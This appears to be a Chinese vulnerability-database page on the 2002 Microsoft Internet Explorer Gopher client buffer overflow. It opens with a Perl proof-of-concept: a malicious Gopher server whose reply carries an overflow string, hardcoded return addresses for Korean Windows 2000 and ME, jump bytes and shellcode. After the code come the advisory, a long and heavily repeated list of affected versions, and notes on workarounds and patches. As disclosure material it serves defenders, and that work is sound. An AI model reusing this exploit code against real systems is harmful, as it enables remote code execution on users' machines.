for($waitedpid=0;($paddr=accept(Client,Server))||$waitedpid;$waitedpid=0,close
Client)
{
	next if $waitedpid and not $paddr;
	my ($port,$iaddr)=sockaddr_in($paddr);
	my $addr_str=inet_ntoa($iaddr);
	my $name=gethostbyaddr($iaddr,AF_INET);
	printf "got connection: $name: $addr_str\n";

	spawn sub{
		while(<STDIN>)
		{
			send_gopher_plus_exploit_reply;
			last;
		}
	}
}

sub spawn {
	my $coderef=shift;
	unless(@_ == 0 && $coderef && ref($coderef) eq 'CODE'){
		printf "what the hell??\n";
		confess "usage: spawn CODEREF";
	}
	my $pid;
	if(!defined($pid=fork)){
		return;
	}elsif($pid)
	{
		return; #parent
	}
	#child
	open(STDIN,"<&Client") || die "can't dup client to stdin";
	open(STDOUT,">&Client") || die "can't dup client to stdout";
	exit &$coderef();
}

sub send_gopher_plus_exploit_reply
{
	my $send_buffer="+-2\r\n+INFO:
1helllo\tyou\thohst\t70\t+\r\n+ADMIN:\r\nAdmin: mat
<mat\@monkey.org>\r\nMod-Date: August 15,1992 <19920815185503>\r\n+VIEWS:\r\n%s
<hi>\r\n+ABSTRACT:\r\nThe shellcode:%s";
	#my $send_buffer="+-2\r\n+INFO: 1t\they\thost\t70\t+\r\n+VIEWS:\r\n%s
<hi>\r\n%s";

	my $fillup_str1="A"x216;
	my $ool_flag=pack("L",0x00000001); #not matters(for testing)
	my $fillup_str2="A"x8;
	my $get_line_ret=pack("L",0x00002F65); #not matters(for testing)
	my $end_part="C"x12;
	my
$fillup_str="${fillup_str1}${ool_flag}${fillup_str2}${get_line_ret}${end_part}";


	#call esp(FF E4)
	#our code jumps to esp
	my $retaddr;
	if($os_str eq $w2k_sp2_kor || $os_str eq $w2k_kor)
	{
		$retaddr=pack("L",0x70426e70); #w2k SP2 Korean Version
	}elsif($os_str eq $wme_kor)
	{
		$retaddr=pack("L",0x75ff875b); #wme Korean Version
	}

	my $additional_str="X"x8;

	my $bootcode=""; #go to the shellcode position! by looking up a
variable in the stack(which is hMemHandle) and following the structure... This
is caused by the gopher code can't process more than 1024 bytes in a line.
	if($os_str eq $w2k_sp2_kor)
	{
	
#$bootcode="\x8b\x84\x24\x1c\x01\x00\x00\x8b\x78\x24\x8b\x57\x14\x81\xc2\xaf\x01
\x00\x00\xff\xe2";  # in sometime this code can't be used~
	
$bootcode="\x8b\x7e\x24\x8b\x57\x14\x81\xc2\xa8\x01\x00\x00\xff\xe2"; # this
works always..
	}elsif($os_str eq $w2k_kor)
	{
	
$bootcode="\x8b\x7e\x24\x8b\x57\x14\x81\xc2\xa8\x01\x00\x00\xff\xe2";
	}elsif($os_str eq $wme_kor)
	{
	
$bootcode="\x8b\x7e\x24\x8b\x57\x14\x81\xc2\xa8\x01\x00\x00\xff\xe2";
	}
	my $exploit_str="$fillup_str$retaddr$additional_str$bootcode";

	my $shellcode="";
	if($os_str eq $w2k_sp2_kor || $os_str eq $w2k_kor)
	{
		$shellcode=$DeepZone_w32ShellCode_for_w2k_kor;
	}elsif($os_str eq $wme_kor)
	{
		$shellcode=$DeepZone_w32ShellCode_for_wme_kor;
	}
	printf $send_buffer,$exploit_str,$shellcode;
}




		

- 漏洞信息

3004
Microsoft IE Gopher Client Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

Microsoft Internet Explorer contains a flaw in it's built-in Gopher client. The flaw is due to an exploitable buffer overflow when gopher:// URLs are parsed. An attacker can exploit this bug by creating a malicious HTML page with a crafted gopher:// URL that overflows the buffer and injects shell code.

- 时间线

2002-06-04 Unknow
2002-06-04 Unknow

- 解决方案

Currently, there are no upgrades to correct this issue. However, Microsoft has released a patch and workaround to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Microsoft Product Gopher Client Buffer Overflow Vulnerability
Boundary Condition Error 4930
Yes No
2002-06-04 12:00:00 2013-04-19 02:40:00
Credited to Jouko Pynnonen <jouko@solutions.fi>.

- 受影响的程序版本

Microsoft Proxy Server 2.0 SP1
Microsoft Proxy Server 2.0
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft ISA Server 2000 SP1
+ Microsoft Small Business Server 2000 0
+ Microsoft Small Business Server 2003 Premium Edition
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Microsoft ISA Server 2000
+ Microsoft Small Business Server 2000 0
+ Microsoft Small Business Server 2003 Premium Edition
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Server
Microsoft Internet Explorer 5.0.1 SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
Microsoft Internet Explorer 5.0.1 SP1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
Microsoft Internet Explorer 5.0.1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows 98SE
+ Microsoft Windows ME
+ Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
Microsoft Internet Explorer 6.0
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium

- 漏洞讨论

Microsoft Internet Explorer, Proxy Server and ISA Server includes a gopher client. Reportedly, these clients are vulnerable to a buffer overflow condition.

The vulnerability exists in the component that parses gopher replies. A malicious server is able to send a reply that will overflow the buffer and run arbitrary code on a user's system.

- 漏洞利用

Proof of concept code to exploit Microsoft Internet Explorer has been published:

- 解决方案

Microsoft has recommended to block access to the Gopher protocol (TCP port 70) or define a non-functional Gopher proxy in Internet Explorer. It should be noted that it is still possible for an attacker to run a malicious Gopher Server on an arbitrary port on Unix and Linux systems.

Patches for Proxy Server 2000 SP1 and ISA Server 2000 SP1 are available. Microsoft has also released a fix for Microsoft Internet Explorer.


Microsoft Internet Explorer 5.5 SP1

Microsoft Internet Explorer 5.5

Microsoft Proxy Server 2.0 SP1

Microsoft Internet Explorer 5.5 SP2

Microsoft ISA Server 2000 SP1

Microsoft Internet Explorer 6.0

Microsoft Internet Explorer 5.0.1 SP1

Microsoft Internet Explorer 5.0.1

Microsoft Internet Explorer 5.0.1 SP2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站